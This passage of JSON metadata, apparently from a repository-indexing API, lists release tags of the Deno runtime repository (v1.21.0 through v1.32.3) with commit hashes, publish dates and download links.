fests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/